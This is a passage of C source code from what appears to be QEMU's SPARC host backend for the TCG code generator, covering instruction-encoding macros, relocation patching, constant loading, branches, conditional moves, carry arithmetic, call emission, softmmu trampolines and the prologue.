0x3ff)) #define INSN_IMM11(x) ((1 << 13) | ((x) & 0x7ff)) #define INSN_IMM13(x) ((1 << 13) | ((x) & 0x1fff)) #define INSN_OFF16(x) ((((x) >> 2) & 0x3fff) | ((((x) >> 16) & 3) << 20)) #define INSN_OFF19(x) (((x) >> 2) & 0x07ffff) #define INSN_COND(x) ((x) << 25) #define COND_N 0x0 #define COND_E 0x1 #define COND_LE 0x2 #define COND_L 0x3 #define COND_LEU 0x4 #define COND_CS 0x5 #define COND_NEG 0x6 #define COND_VS 0x7 #define COND_A 0x8 #define COND_NE 0x9 #define COND_G 0xa #define COND_GE 0xb #define COND_GU 0xc #define COND_CC 0xd #define COND_POS 0xe #define COND_VC 0xf #define BA (INSN_OP(0) | INSN_COND(COND_A) | INSN_OP2(0x2)) #define RCOND_Z 1 #define RCOND_LEZ 2 #define RCOND_LZ 3 #define RCOND_NZ 5 #define RCOND_GZ 6 #define RCOND_GEZ 7 #define MOVCC_ICC (1 << 18) #define MOVCC_XCC (1 << 18 | 1 << 12) #define BPCC_ICC 0 #define BPCC_XCC (2 << 20) #define BPCC_PT (1 << 19) #define BPCC_PN 0 #define BPCC_A (1 << 29) #define BPR_PT BPCC_PT #define ARITH_ADD (INSN_OP(2) | INSN_OP3(0x00)) #define ARITH_ADDCC (INSN_OP(2) | INSN_OP3(0x10)) #define ARITH_AND (INSN_OP(2) | INSN_OP3(0x01)) #define ARITH_ANDN (INSN_OP(2) | INSN_OP3(0x05)) #define ARITH_OR (INSN_OP(2) | INSN_OP3(0x02)) #define ARITH_ORCC (INSN_OP(2) | INSN_OP3(0x12)) #define ARITH_ORN (INSN_OP(2) | INSN_OP3(0x06)) #define ARITH_XOR (INSN_OP(2) | INSN_OP3(0x03)) #define ARITH_SUB (INSN_OP(2) | INSN_OP3(0x04)) #define ARITH_SUBCC (INSN_OP(2) | INSN_OP3(0x14)) #define ARITH_ADDC (INSN_OP(2) | INSN_OP3(0x08)) #define ARITH_SUBC (INSN_OP(2) | INSN_OP3(0x0c)) #define ARITH_UMUL (INSN_OP(2) | INSN_OP3(0x0a)) #define ARITH_SMUL (INSN_OP(2) | INSN_OP3(0x0b)) #define ARITH_UDIV (INSN_OP(2) | INSN_OP3(0x0e)) #define ARITH_SDIV (INSN_OP(2) | INSN_OP3(0x0f)) #define ARITH_MULX (INSN_OP(2) | INSN_OP3(0x09)) #define ARITH_UDIVX (INSN_OP(2) | INSN_OP3(0x0d)) #define ARITH_SDIVX (INSN_OP(2) | INSN_OP3(0x2d)) #define ARITH_MOVCC (INSN_OP(2) | INSN_OP3(0x2c)) #define ARITH_MOVR (INSN_OP(2) | INSN_OP3(0x2f)) #define ARITH_ADDXC (INSN_OP(2) | INSN_OP3(0x36) | INSN_OPF(0x11)) #define ARITH_UMULXHI (INSN_OP(2) | INSN_OP3(0x36) | INSN_OPF(0x16)) #define SHIFT_SLL (INSN_OP(2) | INSN_OP3(0x25)) #define SHIFT_SRL (INSN_OP(2) | INSN_OP3(0x26)) #define SHIFT_SRA (INSN_OP(2) | INSN_OP3(0x27)) #define SHIFT_SLLX (INSN_OP(2) | INSN_OP3(0x25) | (1 << 12)) #define SHIFT_SRLX (INSN_OP(2) | INSN_OP3(0x26) | (1 << 12)) #define SHIFT_SRAX (INSN_OP(2) | INSN_OP3(0x27) | (1 << 12)) #define RDY (INSN_OP(2) | INSN_OP3(0x28) | 
INSN_RS1(0)) #define WRY (INSN_OP(2) | INSN_OP3(0x30) | INSN_RD(0)) #define JMPL (INSN_OP(2) | INSN_OP3(0x38)) #define RETURN (INSN_OP(2) | INSN_OP3(0x39)) #define SAVE (INSN_OP(2) | INSN_OP3(0x3c)) #define RESTORE (INSN_OP(2) | INSN_OP3(0x3d)) #define SETHI (INSN_OP(0) | INSN_OP2(0x4)) #define CALL INSN_OP(1) #define LDUB (INSN_OP(3) | INSN_OP3(0x01)) #define LDSB (INSN_OP(3) | INSN_OP3(0x09)) #define LDUH (INSN_OP(3) | INSN_OP3(0x02)) #define LDSH (INSN_OP(3) | INSN_OP3(0x0a)) #define LDUW (INSN_OP(3) | INSN_OP3(0x00)) #define LDSW (INSN_OP(3) | INSN_OP3(0x08)) #define LDX (INSN_OP(3) | INSN_OP3(0x0b)) #define STB (INSN_OP(3) | INSN_OP3(0x05)) #define STH (INSN_OP(3) | INSN_OP3(0x06)) #define STW (INSN_OP(3) | INSN_OP3(0x04)) #define STX (INSN_OP(3) | INSN_OP3(0x0e)) #define LDUBA (INSN_OP(3) | INSN_OP3(0x11)) #define LDSBA (INSN_OP(3) | INSN_OP3(0x19)) #define LDUHA (INSN_OP(3) | INSN_OP3(0x12)) #define LDSHA (INSN_OP(3) | INSN_OP3(0x1a)) #define LDUWA (INSN_OP(3) | INSN_OP3(0x10)) #define LDSWA (INSN_OP(3) | INSN_OP3(0x18)) #define LDXA (INSN_OP(3) | INSN_OP3(0x1b)) #define STBA (INSN_OP(3) | INSN_OP3(0x15)) #define STHA (INSN_OP(3) | INSN_OP3(0x16)) #define STWA (INSN_OP(3) | INSN_OP3(0x14)) #define STXA (INSN_OP(3) | INSN_OP3(0x1e)) #define MEMBAR (INSN_OP(2) | INSN_OP3(0x28) | INSN_RS1(15) | (1 << 13)) #define NOP (SETHI | INSN_RD(TCG_REG_G0) | 0) #ifndef ASI_PRIMARY_LITTLE #define ASI_PRIMARY_LITTLE 0x88 #endif #define LDUH_LE (LDUHA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define LDSH_LE (LDSHA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define LDUW_LE (LDUWA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define LDSW_LE (LDSWA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define LDX_LE (LDXA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define STH_LE (STHA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define STW_LE (STWA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define STX_LE (STXA | INSN_ASI(ASI_PRIMARY_LITTLE)) #ifndef use_vis3_instructions bool use_vis3_instructions; #endif static inline int check_fit_i64(int64_t val, unsigned int bits) { return val == sextract64(val, 0, bits); } static inline int check_fit_i32(int32_t val, unsigned int bits) { return val == sextract32(val, 0, bits); } #define check_fit_tl check_fit_i64 #if SPARC64 # define check_fit_ptr check_fit_i64 #else # define check_fit_ptr check_fit_i32 #endif static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { uint32_t insn = *code_ptr; intptr_t pcrel; value += addend; pcrel = tcg_ptr_byte_diff((tcg_insn_unit *)value, code_ptr); switch (type) { case R_SPARC_WDISP16: assert(check_fit_ptr(pcrel >> 2, 16)); insn &= ~INSN_OFF16(-1); insn |= INSN_OFF16(pcrel); break; case R_SPARC_WDISP19: assert(check_fit_ptr(pcrel >> 2, 19)); insn &= ~INSN_OFF19(-1); insn |= INSN_OFF19(pcrel); break; default: g_assert_not_reached(); } *code_ptr = insn; return true; } /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch (*ct_str++) { case 'r': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; break; case 'R': ct->ct |= TCG_CT_REG; ct->u.regs = ALL_64; break; case 'A': /* qemu_ld/st address constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = TARGET_LONG_BITS == 64 ? 
ALL_64 : 0xffffffff; reserve_helpers: tcg_regset_reset_reg(ct->u.regs, TCG_REG_O0); tcg_regset_reset_reg(ct->u.regs, TCG_REG_O1); tcg_regset_reset_reg(ct->u.regs, TCG_REG_O2); break; case 's': /* qemu_st data 32-bit constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; goto reserve_helpers; case 'S': /* qemu_st data 64-bit constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = ALL_64; goto reserve_helpers; case 'I': ct->ct |= TCG_CT_CONST_S11; break; case 'J': ct->ct |= TCG_CT_CONST_S13; break; case 'Z': ct->ct |= TCG_CT_CONST_ZERO; break; default: return NULL; } return ct_str; } /* test if a constant matches the constraint */ static inline int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } if (type == TCG_TYPE_I32) { val = (int32_t)val; } if ((ct & TCG_CT_CONST_ZERO) && val == 0) { return 1; } else if ((ct & TCG_CT_CONST_S11) && check_fit_tl(val, 11)) { return 1; } else if ((ct & TCG_CT_CONST_S13) && check_fit_tl(val, 13)) { return 1; } else { return 0; } } static inline void tcg_out_arith(TCGContext *s, TCGReg rd, TCGReg rs1, TCGReg rs2, int op) { tcg_out32(s, op | INSN_RD(rd) | INSN_RS1(rs1) | INSN_RS2(rs2)); } static inline void tcg_out_arithi(TCGContext *s, TCGReg rd, TCGReg rs1, int32_t offset, int op) { tcg_out32(s, op | INSN_RD(rd) | INSN_RS1(rs1) | INSN_IMM13(offset)); } static void tcg_out_arithc(TCGContext *s, TCGReg rd, TCGReg rs1, int32_t val2, int val2const, int op) { tcg_out32(s, op | INSN_RD(rd) | INSN_RS1(rs1) | (val2const ? INSN_IMM13(val2) : INSN_RS2(val2))); } static inline bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { if (ret != arg) { tcg_out_arith(s, ret, arg, TCG_REG_G0, ARITH_OR); } return true; } static inline void tcg_out_sethi(TCGContext *s, TCGReg ret, uint32_t arg) { tcg_out32(s, SETHI | INSN_RD(ret) | ((arg & 0xfffffc00) >> 10)); } static inline void tcg_out_movi_imm13(TCGContext *s, TCGReg ret, int32_t arg) { tcg_out_arithi(s, ret, TCG_REG_G0, arg, ARITH_OR); } static void tcg_out_movi_int(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg, bool in_prologue) { tcg_target_long hi, lo = (int32_t)arg; tcg_target_long test, lsb; /* Make sure we test 32-bit constants for imm13 properly. */ if (type == TCG_TYPE_I32) { arg = lo; } /* A 13-bit constant sign-extended to 64-bits. */ if (check_fit_tl(arg, 13)) { tcg_out_movi_imm13(s, ret, arg); return; } /* A 13-bit constant relative to the TB. */ if (!in_prologue && USE_REG_TB) { test = arg - (uintptr_t)s->code_gen_ptr; if (check_fit_ptr(test, 13)) { tcg_out_arithi(s, ret, TCG_REG_TB, test, ARITH_ADD); return; } } /* A 32-bit constant, or 32-bit zero-extended to 64-bits. */ if (type == TCG_TYPE_I32 || arg == (uint32_t)arg) { tcg_out_sethi(s, ret, arg); if (arg & 0x3ff) { tcg_out_arithi(s, ret, ret, arg & 0x3ff, ARITH_OR); } return; } /* A 32-bit constant sign-extended to 64-bits. */ if (arg == lo) { tcg_out_sethi(s, ret, ~arg); tcg_out_arithi(s, ret, ret, (arg & 0x3ff) | -0x400, ARITH_XOR); return; } /* A 21-bit constant, shifted. */ lsb = ctz64(arg); test = (tcg_target_long)arg >> lsb; if (check_fit_tl(test, 13)) { tcg_out_movi_imm13(s, ret, test); tcg_out_arithi(s, ret, ret, lsb, SHIFT_SLLX); return; } else if (lsb > 10 && test == extract64(test, 0, 21)) { tcg_out_sethi(s, ret, test << 10); tcg_out_arithi(s, ret, ret, lsb - 10, SHIFT_SLLX); return; } /* A 64-bit constant decomposed into 2 32-bit pieces. 
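When lo fits a signed 13-bit immediate, hi is computed as (arg - lo) >> 32 so that the final ADD of the sign-extended lo reproduces arg exactly; otherwise both 32-bit halves are built independently and merged with SLLX and OR through the T2 temporary.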
*/ if (check_fit_i32(lo, 13)) { hi = (arg - lo) >> 32; tcg_out_movi(s, TCG_TYPE_I32, ret, hi); tcg_out_arithi(s, ret, ret, 32, SHIFT_SLLX); tcg_out_arithi(s, ret, ret, lo, ARITH_ADD); } else { hi = arg >> 32; tcg_out_movi(s, TCG_TYPE_I32, ret, hi); tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_T2, lo); tcg_out_arithi(s, ret, ret, 32, SHIFT_SLLX); tcg_out_arith(s, ret, ret, TCG_REG_T2, ARITH_OR); } } static inline void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg) { tcg_out_movi_int(s, type, ret, arg, false); } static inline void tcg_out_ldst_rr(TCGContext *s, TCGReg data, TCGReg a1, TCGReg a2, int op) { tcg_out32(s, op | INSN_RD(data) | INSN_RS1(a1) | INSN_RS2(a2)); } static void tcg_out_ldst(TCGContext *s, TCGReg ret, TCGReg addr, intptr_t offset, int op) { if (check_fit_ptr(offset, 13)) { tcg_out32(s, op | INSN_RD(ret) | INSN_RS1(addr) | INSN_IMM13(offset)); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T1, offset); tcg_out_ldst_rr(s, ret, addr, TCG_REG_T1, op); } } static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg1, intptr_t arg2) { tcg_out_ldst(s, ret, arg1, arg2, (type == TCG_TYPE_I32 ? LDUW : LDX)); } static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { tcg_out_ldst(s, arg, arg1, arg2, (type == TCG_TYPE_I32 ? STW : STX)); } static inline bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { if (val == 0) { tcg_out_st(s, type, TCG_REG_G0, base, ofs); return true; } return false; } static void tcg_out_ld_ptr(TCGContext *s, TCGReg ret, uintptr_t arg) { intptr_t diff = arg - (uintptr_t)s->code_gen_ptr; if (USE_REG_TB && check_fit_ptr(diff, 13)) { tcg_out_ld(s, TCG_TYPE_PTR, ret, TCG_REG_TB, diff); return; } tcg_out_movi(s, TCG_TYPE_PTR, ret, arg & ~0x3ff); tcg_out_ld(s, TCG_TYPE_PTR, ret, ret, arg & 0x3ff); } static inline void tcg_out_sety(TCGContext *s, TCGReg rs) { tcg_out32(s, WRY | INSN_RS1(TCG_REG_G0) | INSN_RS2(rs)); } static inline void tcg_out_rdy(TCGContext *s, TCGReg rd) { tcg_out32(s, RDY | INSN_RD(rd)); } static void tcg_out_div32(TCGContext *s, TCGReg rd, TCGReg rs1, int32_t val2, int val2const, int uns) { /* Load Y with the sign/zero extension of RS1 to 64-bits. */ if (uns) { tcg_out_sety(s, TCG_REG_G0); } else { tcg_out_arithi(s, TCG_REG_T1, rs1, 31, SHIFT_SRA); tcg_out_sety(s, TCG_REG_T1); } tcg_out_arithc(s, rd, rs1, val2, val2const, uns ? 
ARITH_UDIV : ARITH_SDIV); } static inline void tcg_out_nop(TCGContext *s) { tcg_out32(s, NOP); } static const uint8_t tcg_cond_to_bcond[] = { [TCG_COND_EQ] = COND_E, [TCG_COND_NE] = COND_NE, [TCG_COND_LT] = COND_L, [TCG_COND_GE] = COND_GE, [TCG_COND_LE] = COND_LE, [TCG_COND_GT] = COND_G, [TCG_COND_LTU] = COND_CS, [TCG_COND_GEU] = COND_CC, [TCG_COND_LEU] = COND_LEU, [TCG_COND_GTU] = COND_GU, }; static const uint8_t tcg_cond_to_rcond[] = { [TCG_COND_EQ] = RCOND_Z, [TCG_COND_NE] = RCOND_NZ, [TCG_COND_LT] = RCOND_LZ, [TCG_COND_GT] = RCOND_GZ, [TCG_COND_LE] = RCOND_LEZ, [TCG_COND_GE] = RCOND_GEZ }; static void tcg_out_bpcc0(TCGContext *s, int scond, int flags, int off19) { tcg_out32(s, INSN_OP(0) | INSN_OP2(1) | INSN_COND(scond) | flags | off19); } static void tcg_out_bpcc(TCGContext *s, int scond, int flags, TCGLabel *l) { int off19 = 0; if (l->has_value) { off19 = INSN_OFF19(tcg_pcrel_diff(s, l->u.value_ptr)); } else { tcg_out_reloc(s, s->code_ptr, R_SPARC_WDISP19, l, 0); } tcg_out_bpcc0(s, scond, flags, off19); } static void tcg_out_cmp(TCGContext *s, TCGReg c1, int32_t c2, int c2const) { tcg_out_arithc(s, TCG_REG_G0, c1, c2, c2const, ARITH_SUBCC); } static void tcg_out_brcond_i32(TCGContext *s, TCGCond cond, TCGReg arg1, int32_t arg2, int const_arg2, TCGLabel *l) { tcg_out_cmp(s, arg1, arg2, const_arg2); tcg_out_bpcc(s, tcg_cond_to_bcond[cond], BPCC_ICC | BPCC_PT, l); tcg_out_nop(s); } static void tcg_out_movcc(TCGContext *s, TCGCond cond, int cc, TCGReg ret, int32_t v1, int v1const) { tcg_out32(s, ARITH_MOVCC | cc | INSN_RD(ret) | INSN_RS1(tcg_cond_to_bcond[cond]) | (v1const ? INSN_IMM11(v1) : INSN_RS2(v1))); } static void tcg_out_movcond_i32(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, int32_t c2, int c2const, int32_t v1, int v1const) { tcg_out_cmp(s, c1, c2, c2const); tcg_out_movcc(s, cond, MOVCC_ICC, ret, v1, v1const); } static void tcg_out_brcond_i64(TCGContext *s, TCGCond cond, TCGReg arg1, int32_t arg2, int const_arg2, TCGLabel *l) { /* For 64-bit signed comparisons vs zero, we can avoid the compare. */ if (arg2 == 0 && !is_unsigned_cond(cond)) { int off16 = 0; if (l->has_value) { off16 = INSN_OFF16(tcg_pcrel_diff(s, l->u.value_ptr)); } else { tcg_out_reloc(s, s->code_ptr, R_SPARC_WDISP16, l, 0); } tcg_out32(s, INSN_OP(0) | INSN_OP2(3) | BPR_PT | INSN_RS1(arg1) | INSN_COND(tcg_cond_to_rcond[cond]) | off16); } else { tcg_out_cmp(s, arg1, arg2, const_arg2); tcg_out_bpcc(s, tcg_cond_to_bcond[cond], BPCC_XCC | BPCC_PT, l); } tcg_out_nop(s); } static void tcg_out_movr(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, int32_t v1, int v1const) { tcg_out32(s, ARITH_MOVR | INSN_RD(ret) | INSN_RS1(c1) | (tcg_cond_to_rcond[cond] << 10) | (v1const ? INSN_IMM10(v1) : INSN_RS2(v1))); } static void tcg_out_movcond_i64(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, int32_t c2, int c2const, int32_t v1, int v1const) { /* For 64-bit signed comparisons vs zero, we can avoid the compare. Note that the immediate range is one bit smaller, so we must check for that as well. */ if (c2 == 0 && !is_unsigned_cond(cond) && (!v1const || check_fit_i32(v1, 10))) { tcg_out_movr(s, cond, ret, c1, v1, v1const); } else { tcg_out_cmp(s, c1, c2, c2const); tcg_out_movcc(s, cond, MOVCC_XCC, ret, v1, v1const); } } static void tcg_out_setcond_i32(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, int32_t c2, int c2const) { /* For 32-bit comparisons, we can play games with ADDC/SUBC. */ switch (cond) { case TCG_COND_LTU: case TCG_COND_GEU: /* The result of the comparison is in the carry bit. 
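Concretely: the SUBCC issued by tcg_out_cmp sets the carry flag on unsigned borrow, so at the bottom of this function ADDC %g0,0 materializes the carry itself (1 exactly when c1 < c2 unsigned, the LTU result), while SUBC %g0,-1 computes 1 - carry, giving the GEU result.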
*/ break; case TCG_COND_EQ: case TCG_COND_NE: /* For equality, we can transform to inequality vs zero. */ if (c2 != 0) { tcg_out_arithc(s, TCG_REG_T1, c1, c2, c2const, ARITH_XOR); c2 = TCG_REG_T1; } else { c2 = c1; } c1 = TCG_REG_G0, c2const = 0; cond = (cond == TCG_COND_EQ ? TCG_COND_GEU : TCG_COND_LTU); break; case TCG_COND_GTU: case TCG_COND_LEU: /* If we don't need to load a constant into a register, we can swap the operands on GTU/LEU. There's no benefit to loading the constant into a temporary register. */ if (!c2const || c2 == 0) { TCGReg t = c1; c1 = c2; c2 = t; c2const = 0; cond = tcg_swap_cond(cond); break; } /* FALLTHRU */ default: tcg_out_cmp(s, c1, c2, c2const); tcg_out_movi_imm13(s, ret, 0); tcg_out_movcc(s, cond, MOVCC_ICC, ret, 1, 1); return; } tcg_out_cmp(s, c1, c2, c2const); if (cond == TCG_COND_LTU) { tcg_out_arithi(s, ret, TCG_REG_G0, 0, ARITH_ADDC); } else { tcg_out_arithi(s, ret, TCG_REG_G0, -1, ARITH_SUBC); } } static void tcg_out_setcond_i64(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, int32_t c2, int c2const) { if (use_vis3_instructions) { switch (cond) { case TCG_COND_NE: if (c2 != 0) { break; } c2 = c1, c2const = 0, c1 = TCG_REG_G0; /* FALLTHRU */ case TCG_COND_LTU: tcg_out_cmp(s, c1, c2, c2const); tcg_out_arith(s, ret, TCG_REG_G0, TCG_REG_G0, ARITH_ADDXC); return; default: break; } } /* For 64-bit signed comparisons vs zero, we can avoid the compare if the input does not overlap the output. */ if (c2 == 0 && !is_unsigned_cond(cond) && c1 != ret) { tcg_out_movi_imm13(s, ret, 0); tcg_out_movr(s, cond, ret, c1, 1, 1); } else { tcg_out_cmp(s, c1, c2, c2const); tcg_out_movi_imm13(s, ret, 0); tcg_out_movcc(s, cond, MOVCC_XCC, ret, 1, 1); } } static void tcg_out_addsub2_i32(TCGContext *s, TCGReg rl, TCGReg rh, TCGReg al, TCGReg ah, int32_t bl, int blconst, int32_t bh, int bhconst, int opl, int oph) { TCGReg tmp = TCG_REG_T1; /* Note that the low parts are fully consumed before tmp is set. */ if (rl != ah && (bhconst || rl != bh)) { tmp = rl; } tcg_out_arithc(s, tmp, al, bl, blconst, opl); tcg_out_arithc(s, rh, ah, bh, bhconst, oph); tcg_out_mov(s, TCG_TYPE_I32, rl, tmp); } static void tcg_out_addsub2_i64(TCGContext *s, TCGReg rl, TCGReg rh, TCGReg al, TCGReg ah, int32_t bl, int blconst, int32_t bh, int bhconst, bool is_sub) { TCGReg tmp = TCG_REG_T1; /* Note that the low parts are fully consumed before tmp is set. */ if (rl != ah && (bhconst || rl != bh)) { tmp = rl; } tcg_out_arithc(s, tmp, al, bl, blconst, is_sub ? ARITH_SUBCC : ARITH_ADDCC); if (use_vis3_instructions && !is_sub) { /* Note that ADDXC doesn't accept immediates. */ if (bhconst && bh != 0) { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_T2, bh); bh = TCG_REG_T2; } tcg_out_arith(s, rh, ah, bh, ARITH_ADDXC); } else if (bh == TCG_REG_G0) { /* If we have a zero, we can perform the operation in two insns, with the arithmetic first, and a conditional move into place. */ if (rh == ah) { tcg_out_arithi(s, TCG_REG_T2, ah, 1, is_sub ? ARITH_SUB : ARITH_ADD); tcg_out_movcc(s, TCG_COND_LTU, MOVCC_XCC, rh, TCG_REG_T2, 0); } else { tcg_out_arithi(s, rh, ah, 1, is_sub ? ARITH_SUB : ARITH_ADD); tcg_out_movcc(s, TCG_COND_GEU, MOVCC_XCC, rh, ah, 0); } } else { /* Otherwise adjust BH as if there is carry into T2 ... */ if (bhconst) { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_T2, bh + (is_sub ? -1 : 1)); } else { tcg_out_arithi(s, TCG_REG_T2, bh, 1, is_sub ? ARITH_SUB : ARITH_ADD); } /* ... smoosh T2 back to original BH if carry is clear ... */ tcg_out_movcc(s, TCG_COND_GEU, MOVCC_XCC, TCG_REG_T2, bh, bhconst); /* ... 
and finally perform the arithmetic with the new operand. */ tcg_out_arith(s, rh, ah, TCG_REG_T2, is_sub ? ARITH_SUB : ARITH_ADD); } tcg_out_mov(s, TCG_TYPE_I64, rl, tmp); } static void tcg_out_call_nodelay(TCGContext *s, tcg_insn_unit *dest, bool in_prologue) { ptrdiff_t disp = tcg_pcrel_diff(s, dest); if (disp == (int32_t)disp) { tcg_out32(s, CALL | (uint32_t)disp >> 2); } else { uintptr_t desti = (uintptr_t)dest; tcg_out_movi_int(s, TCG_TYPE_PTR, TCG_REG_T1, desti & ~0xfff, in_prologue); tcg_out_arithi(s, TCG_REG_O7, TCG_REG_T1, desti & 0xfff, JMPL); } } static void tcg_out_call(TCGContext *s, tcg_insn_unit *dest) { tcg_out_call_nodelay(s, dest, false); tcg_out_nop(s); } static void tcg_out_mb(TCGContext *s, TCGArg a0) { /* Note that the TCG memory order constants mirror the Sparc MEMBAR. */ tcg_out32(s, MEMBAR | (a0 & TCG_MO_ALL)); } #ifdef CONFIG_SOFTMMU static tcg_insn_unit *qemu_ld_trampoline[16]; static tcg_insn_unit *qemu_st_trampoline[16]; static void emit_extend(TCGContext *s, TCGReg r, int op) { /* Emit zero extend of 8, 16 or 32 bit data as * required by the MO_* value op; do nothing for 64 bit. */ switch (op & MO_SIZE) { case MO_8: tcg_out_arithi(s, r, r, 0xff, ARITH_AND); break; case MO_16: tcg_out_arithi(s, r, r, 16, SHIFT_SLL); tcg_out_arithi(s, r, r, 16, SHIFT_SRL); break; case MO_32: if (SPARC64) { tcg_out_arith(s, r, r, 0, SHIFT_SRL); } break; case MO_64: break; } } static void build_trampolines(TCGContext *s) { static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_SB] = helper_ret_ldsb_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LESW] = helper_le_ldsw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BESW] = helper_be_ldsw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BEQ] = helper_be_ldq_mmu, }; static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; int i; TCGReg ra; for (i = 0; i < 16; ++i) { if (qemu_ld_helpers[i] == NULL) { continue; } /* May as well align the trampoline. */ while ((uintptr_t)s->code_ptr & 15) { tcg_out_nop(s); } qemu_ld_trampoline[i] = s->code_ptr; if (SPARC64 || TARGET_LONG_BITS == 32) { ra = TCG_REG_O3; } else { /* Install the high part of the address. */ tcg_out_arithi(s, TCG_REG_O1, TCG_REG_O2, 32, SHIFT_SRLX); ra = TCG_REG_O4; } /* Set the retaddr operand. */ tcg_out_mov(s, TCG_TYPE_PTR, ra, TCG_REG_O7); /* Set the env operand. */ tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O0, TCG_AREG0); /* Tail call. */ tcg_out_call_nodelay(s, qemu_ld_helpers[i], true); tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O7, ra); } for (i = 0; i < 16; ++i) { if (qemu_st_helpers[i] == NULL) { continue; } /* May as well align the trampoline. */ while ((uintptr_t)s->code_ptr & 15) { tcg_out_nop(s); } qemu_st_trampoline[i] = s->code_ptr; if (SPARC64) { emit_extend(s, TCG_REG_O2, i); ra = TCG_REG_O4; } else { ra = TCG_REG_O1; if (TARGET_LONG_BITS == 64) { /* Install the high part of the address. */ tcg_out_arithi(s, ra, ra + 1, 32, SHIFT_SRLX); ra += 2; } else { ra += 1; } if ((i & MO_SIZE) == MO_64) { /* Install the high part of the data. */ tcg_out_arithi(s, ra, ra + 1, 32, SHIFT_SRLX); ra += 2; } else { emit_extend(s, ra, i); ra += 1; } /* Skip the oi argument. */ ra += 1; } /* Set the retaddr operand. 
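Only %o0-%o5 carry register arguments in the SPARC calling convention; if the slots consumed so far have pushed this argument past %o5, the code below stores it to the outgoing stack slot instead and keeps the copy in %g1.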
*/ if (ra >= TCG_REG_O6) { tcg_out_st(s, TCG_TYPE_PTR, TCG_REG_O7, TCG_REG_CALL_STACK, TCG_TARGET_CALL_STACK_OFFSET); ra = TCG_REG_G1; } tcg_out_mov(s, TCG_TYPE_PTR, ra, TCG_REG_O7); /* Set the env operand. */ tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O0, TCG_AREG0); /* Tail call. */ tcg_out_call_nodelay(s, qemu_st_helpers[i], true); tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O7, ra); } } #endif /* Generate global QEMU prologue and epilogue code */ static void tcg_target_qemu_prologue(TCGContext *s) { int tmp_buf_size, frame_size; /* The TCG temp buffer is at the top of the frame, immediately below the frame pointer. */ tmp_buf_size = CPU_TEMP_BUF_NLONGS * (int)sizeof(long); tcg_set_frame(s, TCG_REG_I6, TCG_TARGET_STACK_BIAS - tmp_buf_size, tmp_buf_size); /* TCG_TARGET_CALL_STACK_OFFSET includes the stack bias, but is otherwise the minimal frame usable by callees. */ frame_size = TCG_TARGET_CALL_STACK_OFFSET - TCG_TARGET_STACK_BIAS; frame_size += TCG_STATIC_CALL_ARGS_SIZE + tmp_buf_size; frame_size += TCG_TARGET_STACK_ALIGN - 1; frame_size &= -TCG_TARGET_STACK_ALIGN; tcg_out32(s, SAVE | INSN_RD(TCG_REG_O6) | INSN_RS1(TCG_REG_O6) | INSN_IMM13(-frame_size)); #ifndef CONFIG_SOFTMMU if (guest_base != 0) { tcg_out_movi_int(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, guest_base, true); tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); } #endif /* We choose TCG_REG_TB such that no move is required. */ if (USE_REG_TB) { QEMU_BUILD_BUG_ON(TCG_REG_TB != TCG_REG_I1); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TB); } tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I1, 0, JMPL); /* delay slot */ tcg_out_nop(s); /* Epilogue for goto_ptr. */ s->code_gen_epilogue = s->code_ptr; tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I7, 8, RETURN); /* delay slot */ tcg_out_movi_imm13(s, TCG_REG_O0, 0); #ifdef CONFIG_SOFTMMU build_trampolines(s); #endif } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { int i; for (i = 0; i < count; ++i) { p[i] = NOP; } } #if defined(CONFIG_SOFTMMU) /* We expect to use a 13-bit negative offset from ENV. */ 